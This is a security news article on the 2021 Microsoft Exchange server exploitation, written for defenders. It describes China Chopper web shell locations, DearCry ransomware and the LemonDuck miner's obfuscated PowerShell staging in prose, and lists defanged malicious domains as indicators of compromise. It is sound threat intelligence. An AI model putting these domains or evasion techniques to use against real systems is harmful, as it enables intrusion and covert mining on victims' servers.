Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Vulnerabilities / Threats

// // //
10:00 AM
John Hammond
John Hammond
Connect Directly
E-Mail vvv

Exchange Exploitation: Not Dead Yet

The mass exploitation of Exchange Servers has been a wake-up call, and it will take all parties playing in concert for the industry to react, respond, and recover.

"March Madness" is a jovial nickname for the third month of the year — but in 2021, the cybersecurity industry felt the brunt of March madness for a reason other than basketball: mass exploitation of Microsoft Exchange Servers. Almost two months later, we're still living in the aftermath of this widespread incident.

Related Content:

Microsoft Exchange Server Attacks: 9 Lessons for Defenders

Special Report: Assessing Cybersecurity Risk in Today's Enterprises

New From The Edge: 10K Hackers Defend the Planet Against Extraterrestrials

On March 1, Huntress learned about new vulnerabilities that would offer an unauthorized actor full control of a Microsoft Exchange server. These vulnerabilities were not yet disclosed, but enterprise organizations and small- to medium-sized businesses were already being exploited. On March 2, Microsoft released its first security advisory, warning companies about these dangerous vulnerabilities. Unfortunately, it seemed Microsoft's initial announcement missed the mark.

What became dubbed as "Exchange Marauder," Microsoft originally described as "limited and targeted [in scope]," yet practically every version of Exchange was vulnerable, and these servers are publicly facing on the open Internet. While cloud servers were not affected and only on-premises installations of Exchange were susceptible to this attack, soon more than 30,000 organizations in the US alone were known to be affected.

Some experts say attacks using these vulnerabilities began as early as January 6. A successful exploit chained together multiple vulnerabilities to eventually gain remote code execution (RCE) on the target host by dropping a "Web shell" in a publicly accessible location. These Web shells were unique files that would process and evaluate code on the server itself and allow anyone who knew the specific key or parameter to run commands and fully control the machine as an administrative user.

The early days of the month were filled with chaos and uncertainty. It was difficult to determine if the initial patches that Microsoft released were in effect, and if there was presence of any Web shell, you were already compromised, and the patch wouldn't help. The cybersecurity industry got scrappy: We were notifying individuals through Reddit, doing threat hunting and intelligence on Twitter, sharing indicators of compromise on GitHub and Pastebin ... whatever was the fastest method to disseminate information.

While the industry was screaming from the rooftops to patch, patch, patch, we also wanted to contribute to the threat intelligence and help inform organizations of potential indicators of compromise (IoCs). The most blatant IoC is a Web shell itself. These Web shells follow the structure of a "China Chopper," a nickname given to a style of simple, minimalist syntax to run a command supplied as part of the Web request.

These have typically been found in the C:\inetpub\wwwroot\aspnet_client directory or subdirectories, with unfamiliar or random filenames and a .aspx extension. (We have seen a large amount of variations to these Web shells and have been archiving them here.)

Initially, these Web shells seemed to slip past most every antivirus (AV), endpoint detection and response (EDR), or preventive security solution.

An excerpt of our inventoried Web shells, indicating the filename, when it was modified, and preventive security software installed on the host. The timestamps indicated in red are our earliest identified compromise, days before the initial reporting from Microsoft. Credit: Huntress
An excerpt of our inventoried Web shells, indicating the filename, when it was modified, and preventive security software installed on the host. The timestamps indicated in red are our earliest identified compromise, days before the initial reporting from Microsoft. Credit: Huntress

Prevention is hard. Now, just about every AV and EDR product will get ahead of this. It does show, however, that this small, simple syntax slipped by and shook up the industry.

After the Web shell is in place and the threat actors have gained access, the question becomes "what will they do next?" What becomes of these targets and victims after the compromise? While the hackers have complete administrative access, they could drop ransomware, farm this machine into a botnet, deface the victim's websites, steal and sell data … anything they would like.

We have since seen indicators of ransomware targeting these compromised Exchange Servers dubbed "DearCry." DearCry uses both AES and RSA cryptography and leaves files encrypted with a "DEARCRY!" header at the top of the file contents.

More often than ransomware, surprisingly, is evidence of cryptocurrency miners. An old family of cryptomining malware, "LemonDuck," has reemerged.

LemonDuck hides through multiple obfuscated payloads but uses RSA to validate each stage. While there are many domains and IoCs associated with LemonDuck, the most frequent that Huntress has seen as recently as March has been the http[:]//t[.]zker9[.]com and http[:]//t[.]zz3r0[.]com domains.

A persistent foothold of LemonDuck uses PowerShell to download another stager, validating it with RSA.

A clever trick that stagers like this use is appending the current date or time as a variable when requesting data from an external server. This gets around HTTP caching and ensures the content that is received is always the latest copy.

The downloaded code is then executed with "fileless malware" techniques using the IEX syntax, a PowerShell alias for "Invoke-Expression" that evaluates code on the fly. The next layer of code it pulls down runs yet another stager in memory, which is obfuscated by using reversed strings. All of these techniques are attempts for this malware to remain undetected by automated solutions or AV/EDR products.

After six stages of obfuscation, we see the raw source code of this LemonDuck malware written in PowerShell. It checks the architecture of the victim, detects the processor type, and downloads the appropriate mining software. LemonDuck installs its own persistence so it can continue to run on reboot and throttles the computer's resources to earn more money for the attacker.

Unfortunately, around 6% of Exchange Servers today have not been patched and are still vulnerable. These exploits can result in a full domain compromise and cannot be taken lightly.

Microsoft has released its April Security Update, disclosing even more critical vulnerabilities against Exchange. Allegedly, these vulnerabilities have been exploited in the wild, but the impetus to patch should be the same as in March. Two of these new vulnerabilities don't require authentication and can be triggered without user interaction, ultimately gaining the attacker RCE. These vulnerabilities are grave and should not be neglected. Threat hunters and security researchers will continue to monitor for any IoCs and share new information as it is released.

We cannot rely on automated solutions alone. Automation is divine, but manual analysis and human investigation are musts. China Chopper Web shells slid under the radar, post-access malware and Trojans continue to bypass defenses with clever obfuscation and evasion techniques — and this research requires context and expertise from security practitioners. While the mass exploitation of Exchange Servers has been a wake-up call, it takes all parties playing in concert for the industry to react, respond, and recover.

John Hammond is a Security Researcher at Huntress as well as a cybersecurity instructor, developer, red teamer, and CTF enthusiast. John is a former Department of Defense Cyber Training Academy curriculum developer and teacher for the Cyber Threat Emulation course, educating ... View Full Bio
Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
I Smell a RAT! New Cybersecurity Threats for the Crypto Industry
David Trepp, Partner, IT Assurance with accounting and advisory firm BPM LLP,  7/9/2021
Attacks on Kaseya Servers Led to Ransomware in Less Than 2 Hours
Robert Lemos, Contributing Writer,  7/7/2021
It's in the Game (but It Shouldn't Be)
Tal Memran, Cybersecurity Expert, CYE,  7/9/2021
Register for Dark Reading Newsletters
White Papers
Current Issue
Everything You Need to Know About DNS Attacks
It's important to understand DNS, potential attacks against it, and the tools and techniques required to defend DNS infrastructure. This report answers all the questions you were afraid to ask. Domain Name Service (DNS) is a critical part of any organization's digital infrastructure, but it's also one of the least understood. DNS is designed to be invisible to business professionals, IT stakeholders, and many security professionals, but DNS's threat surface is large and widely targeted. Attackers are causing a great deal of damage with an array of attacks such as denial of service, DNS cache poisoning, DNS hijackin, DNS tunneling, and DNS dangling. They are using DNS infrastructure to take control of inbound and outbound communications and preventing users from accessing the applications they are looking for. To stop attacks on DNS, security teams need to shore up the organization's security hygiene around DNS infrastructure, implement controls such as DNSSEC, and monitor DNS traffic
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2023-05-26
Craft is a CMS for creating custom digital experiences. Cross site scripting (XSS) can be triggered by review volumes. This issue has been fixed in version 4.4.7.
PUBLISHED: 2023-05-26
Django-SES is a drop-in mail backend for Django. The django_ses library implements a mail backend for Django using AWS Simple Email Service. The library exports the `SESEventWebhookView class` intended to receive signed requests from AWS to handle email bounces, subscriptions, etc. These requests ar...
PUBLISHED: 2023-05-26
Highlight is an open source, full-stack monitoring platform. Highlight may record passwords on customer deployments when a password html input is switched to `type="text"` via a javascript "Show Password" button. This differs from the expected behavior which always obfuscates `ty...
PUBLISHED: 2023-05-26
Craft is a CMS for creating custom digital experiences on the web.The platform does not filter input and encode output in Quick Post validation error message, which can deliver an XSS payload. Old CVE fixed the XSS in label HTML but didn’t fix it when clicking save. This issue was...
PUBLISHED: 2023-05-26
GDSDB infinite loop in Wireshark 4.0.0 to 4.0.5 and 3.6.0 to 3.6.13 allows denial of service via packet injection or crafted capture file